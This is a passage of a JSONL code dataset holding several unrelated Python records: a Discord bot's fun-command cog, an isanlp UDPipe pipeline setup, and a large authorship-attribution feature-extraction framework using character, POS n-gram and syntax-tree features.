c_ok)\r\n\telse:\r\n\t\tprint('d' + ' ' * 9 + c_fail)\r\n\r\n\r\nif args.v:\r\n\tprint('pwdmkr test v{} {} by maxrt101'.format(version, test_type))\r\nelse:\r\n\tmain(args.name)\r\n","sub_path":"scripts/pwdmkr_test_script.py","file_name":"pwdmkr_test_script.py","file_ext":"py","file_size_in_byte":5104,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"30212751","text":"from discord.ext import commands\nimport discord\nimport asyncio\nfrom bs4 import BeautifulSoup\nimport requests\nimport urllib.request\nimport random\n\nmagic8ball = [\"It is certain\",\n \"It is decidedly so\",\n \"Without a doubt\",\n \"Yes, definitely\",\n \"You may 
rely on it\",\n \"As I see it, yes\",\n \"Most likely\",\n \"Outlook good\",\n \"Yes\",\n \"Signs point to yes\",\n \"Reply hazy try again\",\n \"Ask again later\",\n \"Better not tell you now\",\n \"Cannot predict now\",\n \"Concentrate and ask again\",\n \"Don't count on it\",\n \"My reply is no\",\n \"My sources say no\",\n \"Outlook not so good\",\n \"Very doubtful\"\n ]\n\ndef url_open(url):\n try:\n resp = requests.get(url)\n data = BeautifulSoup(resp.content, \"html.parser\")\n except Exception as e:\n print(e)\n return None\n else:\n return data\n\nclass fun:\n \"Fun commands\"\n\n def __init__(self, bot):\n self.bot = bot\n\n @commands.command()\n async def react(self):\n \"-Posts a random reaction image.\"\n data = url_open(\"http://replygif.net/random\")\n imgurl = data.find('img')['src']\n await self.bot.say(imgurl + '.gif')\n\n\n\n @commands.command()\n async def meme(self):\n \"-Posts a random meme image.\"\n data = url_open(\"http://www.quickmeme.com/random\")\n memeurl = data.find('img')['src']\n await self.bot.say(memeurl)\n\n @commands.command(pass_context=True)\n async def pun(self, ctx):\n \"-Posts a pun.\"\n try:\n await self.bot.delete_message(ctx.message)\n except:\n pass\n await self.bot.send_typing(ctx.message.channel)\n data = url_open(\"http://pun.me/random\")\n await self.bot.say(\"`\" + data.find('span').string + \"`\")\n\n @commands.command()\n async def ask(self):\n \"-Answers a binary question\"\n await self.bot.say(\"`\" + magic8ball[random.randint(0, 19)] + \"`\")\n\n @commands.command()\n async def flip(self):\n \"-Flip a table (heads or tails)\"\n await self.bot.say(\"(╯°□°)╯︵ ┬─┬ `Heads`\" if random.randint(0, 1) else \"(╯°□°)╯︵ ┻━┻ `Tails`\")\n\n\n @commands.command(pass_context=True)\n async def quote(self, ctx, *, target = \"Mystery\"):\n \"-Posts a random quote.\"\n if \"@\" in target:\n try:\n await self.bot.delete_message(ctx.message)\n except:\n pass\n mydiv = None\n while(True):\n data = url_open(\"http://www.urbandictionary.com/random.php\")\n mydiv = data.find(\"div\", {\"class\": \"example\"})\n\n if \":\" not in str(mydiv) and \"
        \" not in str(mydiv) and \"-\" not in str(mydiv):\n break\n\n mydiv = str(mydiv).replace(\"
        \", \"\")\n mydiv = str(mydiv).replace(\"
        \", \"\")\n await self.bot.say(str(mydiv) + \"\\n -\" + target.strip())\n\n\ndef setup(bot):\n bot.add_cog(fun(bot))","sub_path":"cogs/fun.py","file_name":"fun.py","file_ext":"py","file_size_in_byte":3153,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"516620568","text":"from isanlp.processor_udpipe import ProcessorUDPipe\nfrom isanlp import PipelineCommon\n\ndef create_pipeline(delay_init=False):\n return PipelineCommon([(ProcessorUDPipe('/src/parser_UDPIPE/russian-ud-2.0-170801.udpipe'),\n ['morph'],\n {'tokens' : 'tokens',\n 'sentences' : 'sentences',\n 'lemma': 'lemma',\n 'postag' : 'postag',\n 'morph' : 'morph',\n 'syntax_dep_tree' : 'syntax_dep_tree'}\n )],\n name='default')\n","sub_path":"docker/pipeline_object.py","file_name":"pipeline_object.py","file_ext":"py","file_size_in_byte":671,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"481756283","text":"import c_syntax_tree as st\nimport syntax_tree\nimport stanford_parser\nfrom werkzeug import cached_property\nfrom collections import Counter\nimport pos\nimport config\nimport easyparallel\nimport heapq\nimport diskdict\nimport hashlib\nimport pickle\nimport os.path\nimport math\n\n#we agree on the following terminology:\n#\t- a document is a natural language text\n#\tfor examples, consult a bookshelf\n#\t- a document function is a (mathematical) mapping whose domain is the set of all documents\n#\texamples include POS tags, occuring ngrams\n#\t- a feature is a document function whose codomain is R^d for some natural number d (R denotes the set of real numbers)\n#\texamples include word counts, frequencies of k-ee-subtries\n#\t- a document database (or short documentbase) is a set of documents with an author assigned to each document\n#\tsuch a documentbase is the ground truth for the training\n#\t- a view is a mapping that assigns to each documentbase a feature\n#\texamples include: the word frequencies of all occuring word unigrams,\n#\tor the frequencies of all discriminative k-ee-subtrees\n#\t- a classifier is a document function which assigns, to each document, an author\n#\tour aim is to find a good classifier.\n\ndef normalizedCounter(*kwds):\n\tctr = Counter(*kwds)\n\tif not config.normalize_features:\n\t\treturn ctr\n\ts = sum(ctr.values())\n\tfactor = 1.0/sum(ctr.values())\n\treturn Counter({key: value*factor for (key,value) in ctr.items()})\ndef countermax(ctr):\n\tm=max(ctr.values())\n\tfor key,value in ctr.items():\n\t\tif value == m:\n\t\t\treturn key\n\ndocument_identifier_hashfun = hashlib.sha256\nclass document:\n\t__slots__=['text','author','identifier']\n\tdef __init__(self, text, author=None):\n\t\tself.text = text\n\t\tself.author=author\n\t\tself.identifier = document_identifier_hashfun(text.encode('utf-8')).digest()\n\t\t'''\n\t@cached_property\n\tdef identifier(self):\n\t\treturn document_identifier_hashfun(self.text.encode('utf-8')).digest()\n\t\t'''\n\tdef __getstate__(self):\n\t\treturn (self.text,self.author)\n\tdef __setstate__(self,state):\n\t\tself.__init__(*state)\nclass documentFunction:\n\t__slots__=['cachedValues','functionCollection']\n\tdef __init__(self):\n\t\t#print(\"created document function\",type(self),hasattr(self,'functionCollection'))\n\t\tif not hasattr(self,'functionCollection'):\n\t\t\traise Exception(\"no function collection?\")\n\t\tself.cachedValues={}\n\tdef setCacheDict(self,dictionary):\n\t\tself.cachedValues=dictionary\n\tdef closeCache(self):\n\t\tif 
isinstance(self.cachedValues,diskdict.DiskDict):\n\t\t\tself.cachedValues.close()\n\t'''def __del__(self):\n\t\tprint(\"delete document function\",type(self))'''\n\tdef getValue(self,document):\n\t\tkey=document.identifier\n\t\tif key in self.cachedValues:\n\t\t\treturn self.cachedValues[key]\n\t\tresult=self.mapping(document)\n\t\tself.cachedValues[key]=result\n\t\treturn result\n\tdef getValuev(self,documents):\n\t\t#vectorized function\n\t\tkeys = [d.identifier for d in documents]\n\t\tavailable = [key in self.cachedValues for key in keys]\n\t\tmissingIndices = [i for i in range(len(documents)) if not available[i]]\n\t\tmissingValues = self.mappingv([documents[i] for i in missingIndices]) if missingIndices else []\n\t\tif len(missingIndices) != len(missingValues):\n\t\t\traise Exception(\"Called mappingv with %u documents, got %u values.\" % (len(documents), len(missingValues)))\n\t\tresult = []\n\t\tcached_keys=[key for (key,avail) in zip(keys,available) if avail ]\n\t\tcached_values = iter(self.cachedValues.fetchMany(cached_keys)) if isinstance(self.cachedValues,diskdict.DiskDict) else \\\n\t\t\t\t\t(self.cachedValues[key] for key in cached_keys)\n\t\tmissingValues = iter(missingValues)\n\t\tfor avail,key,doc in zip(available,keys,documents):\n\t\t\tif avail:\n\t\t\t\tresult.append(next(cached_values))\n\t\t\telse:\n\t\t\t\tvalue = next(missingValues)\n\t\t\t\tresult.append(value)\n\t\t\t\t#print(\"cache value %s under key %s\" % (repr(value),repr(key)))\n\t\t\t\tself.cachedValues[key]=value\n\t\treturn result\n\t# one of mapping or mappingv must be implemented.\n\tdef mapping(self,document):\n\t\t# applies to a single text\n\t\treturn self.mappingv([document])[0]\n\tdef mappingv(self,documents):\n\t\t# vectorized function\n\t\treturn [self.mapping(d) for d in documents]\n\tdef writeValueToCache(self,document,value):\n\t\tself.cachedValues[document.identifier]=value\n\tdef valueIsCached(self, document):\n\t\treturn document.identifier in self.cachedValues\n\tdef clearCache(self):\n\t\tif isinstance(self.cachedValues,diskdict.DiskDict):\n\t\t\tself.cachedValues.close()\n\t\tself.cachedValues = {}\n\tdef getCacheAsDict(self):\n\t\treturn self.cachedValues.copy()\n\tdef setCacheAsDict(self,dictionary):\n\t\tself.cachedValues.update(dictionary)\n\tdef moveToMemory(self,documents):\n\t\tif isinstance(self.cachedValues,diskdict.DiskDict):\n\t\t\t#print(\"move to memory. 
Cached: \",len(self.cachedValues),\": \",repr(list(self.cachedValues.keys())[:20]))\n\t\t\tself.cachedValues.moveToMemory([document.identifier for document in documents if document.identifier in self.cachedValues])\n\t\t\tunmovable = sum(1 for document in documents if document.identifier not in self.cachedValues)\n\t\t\tif unmovable > 0:\n\t\t\t\traise Exception(\"Cannot move %d documents to memory\" % unmovable)\n\tdef removeFromMemory(self,document):\n\t\tif isinstance(self.cachedValues,diskdict.DiskDict):\n\t\t\tself.cachedValues.removeFromMemory(document.identifier)\n\tdef forgetDocument(self,document):\n\t\tif document.identifier in self.cachedValues:\n\t\t\tif isinstance(self.cachedValues,diskdict.DiskDict):\n\t\t\t\tself.cachedValues.removeFromMemory(document.identifier)\n\t\t\telse:\n\t\t\t\tdel self.cachedValues[document.identifier]\n\tdef getFunction(self,functionClass,*args):\n\t\tif hasattr(self,'functionCollection'):\n\t\t\treturn self.functionCollection.getFunction(functionClass,*args)\n\t\telse:\n\t\t\treturn functionClass(*args)\n\tdef removeFromFunctionCollection(self):\n\t\tif hasattr(self,'functionCollection'):\n\t\t\tself.functionCollection.forgetInstance(self)\nclass derivedDocumentFunction(documentFunction):\n\t#does not only look at the text but also at the outcome of another document function\n\t__slots__=['predecessorFunctionClass','predecessorFunction']\n\tdef __init__(self,predecessorFunctionClass,*kwds):\n\t\tself.predecessorFunctionClass = predecessorFunctionClass\n\t\tif not hasattr(self,'functionCollection'):\n\t\t\tself.predecessorFunction = predecessorFunctionClass(*kwds)\n\t\telse:\n\t\t\tself.predecessorFunction = self.functionCollection.getFunction(predecessorFunctionClass, *kwds)\n\t\tsuper().__init__()\n\tdef deriveValue(self,document,predecessorValue):\n\t\t#to be implemented\n\t\tpass\n\tdef mappingv(self,documents):\n\t\tvalues = self.predecessorFunction.getValuev(documents)\n\t\treturn [self.deriveValue(document,value) for (document,value) in zip(documents,values)]\n\tdef mapping(self,document):\n\t\treturn self.deriveValue(document,self.predecessorFunction.getValue(document))\nclass documentFunctionCollection:\n\t#a set of document functions that may be derived from each other\n\t__slots__=['instances']\n\tdef __init__(self):\n\t\tself.instances={}\n\t\tprint(\"CREATED documentFunctionCollection\",type(self))\n\tdef __del__(self):\n\t\tprint(\"DELETED documentFunctionCollection\")\n\tdef getFunction(self,functionClass,*kwds):\n\t\tkey = (functionClass,kwds)\n\t\tif key not in self.instances:\n\t\t\tres = functionClass.__new__(functionClass,*kwds)\n\t\t\tres.functionCollection=self\n\t\t\tres.__init__(*kwds)\n\t\t\tself.instances[key] = res\n\t\t\treturn res\n\t\treturn self.instances[key]\n\tdef getValue(self,document,functionClass,*kwds):\n\t\treturn self.getFunction(functionClass, *kwds).getValue(document)\n\tdef getValues(self,documents,functionClass,*kwds):\n\t\treturn self.getFunction(functionClass, *kwds).getValuev(documents)\n\tdef forgetFunction(self,functionClass,*kwds):\n\t\tkey = (functionClass,kwds)\n\t\tdel self.instances[key]\n\tdef forgetInstance(self,instance):\n\t\tfor key,value in self.instances.items():\n\t\t\tif value is instance:\n\t\t\t\tdel self.instances[key]\n\t\t\t\treturn\n\tdef free(self):\n\t\tfor fun in self.instances.values():\n\t\t\tfun.clearCache()\n\t\t\tfun.functionCollection = None\n\t\tself.instances = {}\n\tdef forgetDocument(self,document,functionClasses=None):\n\t\t#print(\"asked functionCollection to forget 
document \",document.identifier)\n\t\tif functionClasses is None:\n\t\t\tfor func in self.instances.values():\n\t\t\t\tfunc.forgetDocument(document)\n\t\telse:\n\t\t\tfor functionClass in functionClasses:\n\t\t\t\tkey = (functionClass,())\n\t\t\t\tif key in self.instances:\n\t\t\t\t\tself.instances[key].forgetDocument(document)\n\t\t\t\telse:\n\t\t\t\t\tprint(\"Asked to forget document \",document.identifier,\" for class \",functionClass,\", but have no instance for this.\")\n\tdef moveToMemory(self,docs,functionClasses=None):\n\t\t#print(\"move to memory with these instances: \",self.instances.keys())\n\t\t#print(\"functionClasses: \",functionClasses)\n\t\tfor cls,func in self.instances.items():\n\t\t\tif functionClasses is None or cls[0] in functionClasses:\n\t\t\t\tfunc.moveToMemory(docs)\n\tdef showMemoryStatistics(self):\n\t\tfor key,value in self.instances.items():\n\t\t\tprint(\"key: \",key)\n\t\t\tprint(\"type(value): \",type(value))\n\t\t\tif isinstance(value.cachedValues,diskdict.DiskDict):\n\t\t\t\tprint(key[0],\" (\",*key[1],\") has a DiskDict as cache.\")\n\t\t\telif isinstance(value.cachedValues,dict):\n\t\t\t\tprint(key[0],\" (\",*key[1],\") has a pickled cache size of \",len(pickle.dumps(value.cachedValues)),\\\n\t\t\t\t\t\t\t\t\t\t\" and \",len(value.cachedValues),\" cached values.\")\n\t\t\telse:\n\t\t\t\tprint(\"value: \",value)\n\t\t\t\tprint(\"value.cachedValues: \",value.cachedValues)\n\t\t\t\traise Exception(\"Unexpected type for cachedValues.\")\n\tdef getFeatureIdentifier(self,feature):\n\t\tfor key,feat in self.instances.items():\n\t\t\tif feature is feat:\n\t\t\t\treturn (key[0],*key[1])\n\t\traise Exception(\"Cannot find feature \"+repr(feature))\nclass feature(documentFunction):\n\t__slots__=[]\n\tdef vectorLength(self):\n\t\tpass\nclass combinedFeature(feature):\n\t#given features ft1, ..., ftn; this one maps a document d to (ft1(d), ..., ftn(d))\n\t__slots__=['subfeatures']\n\tdef __init__(self, *argss):\n\t\tprint(\"create combined feature with function collection \", self.functionCollection)\n\t\tself.subfeatures=[self.getFunction(*args) for args in argss]\n\t\tsuper().__init__()\n\tdef vectorLength(self):\n\t\treturn sum(ft.vectorLength() for ft in self.subfeatures)\n\tdef mapping(self, document):\n\t\tresult = []\n\t\tfor ft in self.subfeatures:\n\t\t\tresult+= ft.getValue(document)\n\t\treturn result\n\tdef mappingv(self, documents):\n\t\tresult = [[] for _ in documents]\n\t\tfor ft in self.subfeatures:\n\t\t\tvals=ft.getValuev(documents)\n\t\t\tfor v,r in zip(vals,result):\n\t\t\t\tr += v\n\t\treturn result\n\tdef removeFromFunctionCollection(self,subfeaturesToo=True):\n\t\tif subfeaturesToo:\n\t\t\tfor feat in self.subfeatures:\n\t\t\t\tfeat.removeFromFunctionCollection()\n\t\tsuper().removeFromFunctionCollection()\nclass derivedFeature(feature,derivedDocumentFunction):\n\t__slots__=[]\n\tpass\nclass documentbase:\n\tdef __init__(self, documents):\n\t\tself.documents = documents\n\t\t'''print(\"created documentbase\")\n\tdef __del__(self):\n\t\tprint(\"deleted documentbase\")'''\n\tdef getFunction(self,functionClass,*kwds):\n\t\tif not hasattr(self,'functionCollection'):\n\t\t\treturn functionClass(*kwds)\n\t\telse:\n\t\t\treturn self.functionCollection.getFunction(functionClass,*kwds)\n\t@cached_property\n\tdef byAuthor(self):\n\t\tresult = {}\n\t\tfor d in self.documents:\n\t\t\tif d.author in result:\n\t\t\t\tresult[d.author].append(d)\n\t\t\telse:\n\t\t\t\tresult[d.author]=[d]\n\t\treturn result\n\t@cached_property\n\tdef authors(self):\n\t\treturn 
list(set(self.byAuthor))\n\t@cached_property\n\tdef stDocumentbase(self):\n\t\tfunction = self.getFunction(stDocumentDocumentFunction)\n\t\treturn st.documentbase([st.documentclass(function.getValuev(documents),label=author) for (author,documents) in self.byAuthor.items()])\n\tdef subbase(self, indices):\n\t\tresult=documentbase([self.documents[i] for i in indices])\n\t\tif hasattr(self,'functionCollection'):\n\t\t\tresult.functionCollection = self.functionCollection\n\t\treturn result\n\tdef extend(self, extraDocuments):\n\t\tresult = documentbase(self.documents + extraDocuments)\n\t\tif hasattr(self,'functionCollection'):\n\t\t\tresult.functionCollection = self.functionCollection\n\t\treturn result\n\t@cached_property\n\tdef byIdentifier(self):\n\t\tresult = {}\n\t\tfor d in self.documents:\n\t\t\tif d.identifier in result:\n\t\t\t\tresult[d.identifier].append(d)\n\t\t\telse:\n\t\t\t\tresult[d.identifier] = [d]\n\t\treturn result\n\tdef strippedDuplicates(self,warn=True):\n\t\t#returns a documentbase with duplicates removed. Two documents are considered duplicate iff identifier and author coincide.\n\t\tresult = []\n\t\tfor docs in self.byIdentifier.values():\n\t\t\tknown_authors = []\n\t\t\tfor doc in docs:\n\t\t\t\tif doc.author not in known_authors:\n\t\t\t\t\tknown_authors.append(doc.author)\n\t\t\t\t\tresult.append(doc)\n\t\t\tif len(known_authors) > 1 and warn:\n\t\t\t\tprint(\"WARNING: Found same text by %d authors\" % len(known_authors))\n\t\t\t\tprint(\"authors: \",\", \".join(str(a) for a in known_authors))\n\t\t\t\tprint(\"text:\")\n\t\t\t\tprint(docs[0].text)\n\t\tresult = documentbase(result)\n\t\tif hasattr(self,'functionCollection'):\n\t\t\tresult.functionCollection = self.functionCollection\n\t\treturn result\n\tdef hasSameDocument(self,doc):\n\t\t#returns true if a document with same author and identifier occurs\n\t\tif not doc.identifier in self.byIdentifier:\n\t\t\treturn False\n\t\treturn doc.author in (d.author for d in self.byIdentifier[doc.identifier])\nclass view:\n\t__slots__=['functionCollection']\n\tdef getFeature(self,docbase):\n\t\tpass\n\tdef getFunction(self,functionClass,*kwds):\n\t\tif not hasattr(self,'functionCollection'):\n\t\t\treturn functionClass(*kwds)\n\t\telse:\n\t\t\treturn self.functionCollection.getFunction(functionClass,*kwds)\n\tdef getValue(self,document,functionClass,*kwds):\n\t\treturn self.getFunction(functionClass,*kwds).getValue(document)\n\tdef getValues(self,documents,functionClass,*kwds):\n\t\treturn self.getFunction(functionClass,*kwds).getValuev(documents)\n\tdef createClassifier(self,trainingDocbase,ml):\n\t\treturn documentClassifier(trainingDocbase,self.getFeature(trainingDocbase),ml)\n# now to the concrete stuff\nclass stanfordTreeDocumentFunction(documentFunction):\n\t__slots__=[]\n\t# to each document, return a list of stanford trees, encoding the tokenization, pos-tagging and syntactic structure\n\tdef mappingv(self,documents):\n\t\t#return stanford_parser.parseTextsParallel([d.text for d in documents])\n\t\treturn stanford_parser.parseText([d.text for d in documents])\nclass tokensDocumentFunction(derivedDocumentFunction):\n\t__slots__=[]\n\t#for each document, returns a list of tokens\n\tdef __init__(self):\n\t\tsuper().__init__(stanfordTreeDocumentFunction)\n\tdef deriveValue(self,document,trees):\n\t\t'''\n\t\t!!!!\n\t\t'''\n\t\traise Exception(\"No!\")\n\t\tresult = []\n\t\tfor tree in trees:\n\t\t\tresult += [l.data for l in tree.leaves]\n\t\treturn result\nclass 
tokensCounterDocumentFunction(derivedDocumentFunction):\n\t__slots__=[]\n\t#normalized\n\tdef __init__(self):\n\t\tsuper().__init__(tokensDocumentFunction)\n\tdef deriveValue(self,document,tokens):\n\t\treturn normalizedCounter(tokens)\nclass numTokensDocumentFunction(derivedDocumentFunction):\n\t__slots__=[]\n\tdef __init__(self):\n\t\tsuper().__init__(tokensDocumentFunction)\n\tdef deriveValue(self,document,tokens):\n\t\treturn len(tokens)\n'''\nclass characterNGramDocumentFunction(derivedDocumentFunction):\n\tdef __init__(self,n):\n\t\tself.n=n\n\t\tsuper().__init__(tokensDocumentFunction)\n\tdef deriveValue(self,document,tokens):\n\t\t#print(\"Called to get character n grams for text %s and tokens %s\" % (repr(document.text),repr(tokens)))\n\t\tresult = []\n\t\tfor tok in tokens:\n\t\t\tresult += [tok[i:i+self.n] for i in range(len(tok)-self.n+1)]\n\t\treturn result\n'''\nclass characterNGramDocumentFunction(documentFunction):\n\t__slots__=['n']\n\tdef __init__(self,n):\n\t\tself.n=n\n\t\tsuper().__init__()\n\tdef mapping(self,document):\n\t\tt=document.text\n\t\treturn [t[i:i+self.n] for i in range(len(t)-self.n)]\nclass characterNGramCounterDocumentFunction(derivedDocumentFunction):\n\t__slots__=['n']\n\tdef __init__(self,n):\n\t\tsuper().__init__(characterNGramDocumentFunction,n)\n\tdef deriveValue(self,document,tokens):\n\t\treturn normalizedCounter(tokens)\nclass numCharactersDocumentFunction(documentFunction):\n\t__slots__=[]\n\tdef mapping(self,document):\n\t\treturn len(document.text)\nclass posDocumentFunction(derivedDocumentFunction):\n\t__slots__=[]\n\t#for each document, returns a list of pos tokens\n\tdef __init__(self):\n\t\tsuper().__init__(stanfordTreeDocumentFunction)\n\tdef deriveValue(self,document,trees):\n\t\tresult = []\n\t\tfor tree in trees:\n\t\t\tresult += [l.label for l in tree.leaves]\n\t\treturn result\nclass posCounterDocumentFunction(derivedDocumentFunction):\n\t__slots__=[]\n\tdef __init__(self):\n\t\tsuper().__init__(posDocumentFunction)\n\tdef deriveValue(self,document,pos):\n\t\treturn normalizedCounter(pos)\nclass posNGramDocumentFunction(derivedDocumentFunction):\n\t__slots__=['n']\n\tdef __init__(self,n):\n\t\tself.n=n\n\t\tsuper().__init__(posDocumentFunction)\n\tdef deriveValue(self,document,pos):\n\t\treturn [tuple(pos[i:i+self.n]) for i in range(len(pos)-self.n+1)]\nclass posNGramCounterDocumentFunction(derivedDocumentFunction):\n\t__slots__=['n']\n\tdef __init__(self,n):\n\t\tself.n=n\n\t\tsuper().__init__(posNGramDocumentFunction,n)\n\tdef deriveValue(self,document,pos):\n\t\treturn normalizedCounter(pos)\nclass stDocumentDocumentFunction(derivedDocumentFunction):\n\t__slots__=[]\n\tdef __init__(self):\n\t\tsuper().__init__(stanfordTreeDocumentFunction)\n\tdef deriveValue(self,document,trees):\n\t\treturn st.document([syntax_tree.stanfordTreeToStTree(tree) for tree in trees])\nclass wordUnigramFeature(derivedFeature):\n\t__slots__=['words']\n\tdef __init__(self,words):\n\t\tself.words = words\n\t\tderivedDocumentFunction.__init__(self,tokensCounterDocumentFunction)\n\tdef vectorLength(self):\n\t\treturn len(self.words)\n\tdef deriveValue(self,document,tokensCounter):\n\t\treturn [tokensCounter[tok] for tok in self.words]\nclass characterNGramFeature(derivedFeature):\n\t__slots__=['n','ngrams']\n\tdef __init__(self,n,ngrams):\n\t\tself.n = n\n\t\tself.ngrams = ngrams\n\t\tderivedDocumentFunction.__init__(self,characterNGramCounterDocumentFunction,n)\n\tdef vectorLength(self):\n\t\treturn len(self.ngrams)\n\tdef 
deriveValue(self,document,ngramsCounter):\n\t\treturn [ngramsCounter[ngram] for ngram in self.ngrams]\nclass posNGramFeature(derivedFeature):\n\t__slots__=['n','ngrams']\n\tdef __init__(self,n,ngrams):\n\t\tself.n = n\n\t\tself.ngrams = ngrams\n\t\tderivedDocumentFunction.__init__(self,posNGramCounterDocumentFunction,n)\n\tdef vectorLength(self):\n\t\treturn len(self.ngrams)\n\tdef deriveValue(self,document,ngramsCounter):\n\t\treturn [ngramsCounter[ngram] for ngram in self.ngrams]\nclass syntaxTreeFrequencyFeature(derivedFeature):\n\t__slots__=['trees']\n\tdef __init__(self,trees):\n\t\tself.trees=trees\n\t\tderivedDocumentFunction.__init__(self,stDocumentDocumentFunction)\n\tdef vectorLength(self):\n\t\treturn len(self.trees)\n\tdef deriveValue(self,_,document):\n\t\treturn [document.frequency(tree) for tree in self.trees]\nclass characterView(view):\n\t__slots__=['ns']\n\tdef __init__(self,ns):\n\t\tself.ns = ns\n\tdef getFeature(self, docbase):\n\t\tfeatures = []\n\t\tfor n in self.ns:\n\t\t\tlimit = config.featurelimit_max_character_ngrams[n-1]\n\t\t\tfunction = self.getFunction(characterNGramCounterDocumentFunction,n)\n\t\t\tif limit is None:\n\t\t\t\tvalues=set()\n\t\t\t\tfor vals in function.getValuev(docbase.documents):\n\t\t\t\t\tvalues = values.union(set(vals))\n\t\t\t\tfeatures.append((characterNGramFeature,n,tuple(values)))\n\t\t\telse:\n\t\t\t\tvalues = Counter()\n\t\t\t\tfor doc in docbase.documents:\n\t\t\t\t\tvalues += function.getValue(doc)\n\t\t\t\tselection = heapq.nlargest(limit,values,lambda ngram: values[ngram])\n\t\t\t\tfeatures.append((characterNGramFeature,n,tuple(selection)))\n\t\t#return combinedFeature(features,self.functionCollection if hasattr(self,'functionCollection') else None)\n\t\treturn self.getFunction(combinedFeature,*features)\nclass lexicalView(view):\n\t__slots__=[]\n\tdef getFeature(self, docbase):\n\t\tfunction = self.getFunction(tokensCounterDocumentFunction)\n\t\tlimit = config.featurelimit_max_word_unigrams\n\t\tif limit is None:\n\t\t\tvalues=set()\n\t\t\t#for doc in docbase.documents:#this is not perfect\n\t\t\t#\tvalues = values.union(set(function.getValue(doc)))\n\t\t\tfor vals in function.getValuev(docbase.documents):\n\t\t\t\tvalues = values.union(set(vals))\n\t\t\treturn self.getFunction(wordUnigramFeature,tuple(values))\n\t\telse:\n\t\t\tvalues=Counter()\n\t\t\tfor doc in docbase.documents:\n\t\t\t\tvalues += function.getValue(doc)\n\t\t\tselection = heapq.nlargest(limit,values,lambda unigram: values[unigram])\n\t\t\treturn self.getFunction(wordUnigramFeature,tuple(selection))\nclass syntacticView(view):\n\t__slots__=['ns','supportLowerBound','n','k','remine_trees_until','minedTreesCacheFile','treeFeature']\n\tdef __init__(self, ns, supportLowerBound, n, k, remine_trees_until=0, minedTreesCacheFile = None):\n#if minedTreesCacheFile exists, read the trees from minedTreesCacheFile. Otherwise:\n#if remine_trees_until == 0, remine trees everytime. 
Otherwise, remine `remine_trees_until` times.\n#After each mining, the result gets saved to `minedTreesCacheFile`.\n\t\tself.ns = ns\n\t\tself.supportLowerBound = supportLowerBound\n\t\tself.n = n\n\t\tself.k = k\n\t\tself.remine_trees_until = None if remine_trees_until == 0 else remine_trees_until\n\t\tself.minedTreesCacheFile = minedTreesCacheFile\n\t\tself.treeFeature = None\n\tdef getFeature(self,docbase):\n\t\tfeatures=[]\n\t\tfor n in self.ns:\n\t\t\tfunction = self.getFunction(posNGramCounterDocumentFunction,n)\n\t\t\tlimit = config.featurelimit_max_pos_ngrams[n-1]\n\t\t\tif limit is None:\n\t\t\t\tvalues = set()\n\t\t\t\tfor vals in function.getValuev(docbase.documents):\n\t\t\t\t\tvalues = values.union(set(vals))\n\t\t\t\tfeatures.append((posNGramFeature,n,tuple(values)))\n\t\t\telse:\n\t\t\t\tvalues = Counter()\n\t\t\t\tfor doc in docbase.documents:\n\t\t\t\t\tvalues += function.getValue(doc)\n\t\t\t\tselection = heapq.nlargest(limit,values,lambda ngram: values[ngram])\n\t\t\t\tfeatures.append((posNGramFeature,n,tuple(selection)))\n\t\tbase = docbase.stDocumentbase\n\t\tif self.treeFeature is None and self.minedTreesCacheFile is not None and os.path.exists(self.minedTreesCacheFile):\n\t\t\twith open(self.minedTreesCacheFile,'rb') as f:\n\t\t\t\tself.treeFeature = pickle.load(f)\n\t\t\t\tself.remine_trees_until = 0\n\t\tif self.remine_trees_until == 0:\n\t\t\ttreeFeature = self.treeFeature\n\t\telse:\n\t\t\ttreeFeature = (syntaxTreeFrequencyFeature, \\\n\t\t\t\ttuple(base.mineDiscriminativePatterns(len(pos.pos_tags), self.supportLowerBound, self.n, self.k,\\\n\t\t\t\t\t\t\t\t\t\t\t\tnum_processes=config.num_threads_mining)))\n\t\t\tif self.remine_trees_until is not None:\n\t\t\t\tself.remine_trees_until -= 1\n\t\t\t\tif self.remine_trees_until == 0:\n\t\t\t\t\tself.treeFeature = treeFeature\n\t\t\tif self.minedTreesCacheFile is not None:\n\t\t\t\twith open(self.minedTreesCacheFile,'wb') as f:\n\t\t\t\t\tpickle.dump(treeFeature,f)\n\t\tfeatures.append(treeFeature)\n\t\t#return combinedFeature(features,self.functionCollection if hasattr(self,'functionCollection') else None)\n\t\treturn self.getFunction(combinedFeature,*features)\n\t\t#return treeFeature\n\tdef setTreeFeature(self,feature):\n\t\tself.treeFeature = self.functionCollection.getFeatureIdentifier(feature)\n\t\tself.remine_trees_until=0\n\tdef readTreeFeatureFromClassifier(self,classifier):\n\t\tself.setTreeFeature(classifier.feature)\nclass kimView(view):\n\t__slots__= ['supportLowerBound', 'n', 'k']\n\tdef __init__(self,supportLowerBound=0, n=10, k=2):\n\t\tself.supportLowerBound = supportLowerBound\n\t\tself.n=n\n\t\tself.k=k\n\tdef getFeature(self,docbase):\n\t\treturn self.getFunction(syntaxTreeFrequencyFeature, tuple(docbase.stDocumentbase.mineDiscriminativePatterns(len(pos.pos_tags), \\\n\t\t\tself.supportLowerBound, self.n, self.k, num_processes=config.num_threads_mining)))\nclass posView(view):\n\t__slots__=['ns']\n\tdef __init__(self, ns):\n\t\tself.ns = ns\n\tdef getFeature(self,docbase):\n\t\tfeatures=[]\n\t\tfor n in self.ns:\n\t\t\tfunction = self.getFunction(posNGramCounterDocumentFunction,n)\n\t\t\tlimit = config.featurelimit_max_pos_ngrams[n-1]\n\t\t\tif limit is None:\n\t\t\t\tvalues = set()\n\t\t\t\tfor vals in function.getValuev(docbase.documents):\n\t\t\t\t\tvalues = values.union(set(vals))\n\t\t\t\tfeatures.append((posNGramFeature,n,tuple(values)))\n\t\t\telse:\n\t\t\t\tvalues = Counter()\n\t\t\t\tfor doc in docbase.documents:\n\t\t\t\t\tvalues += function.getValue(doc)\n\t\t\t\tselection = 
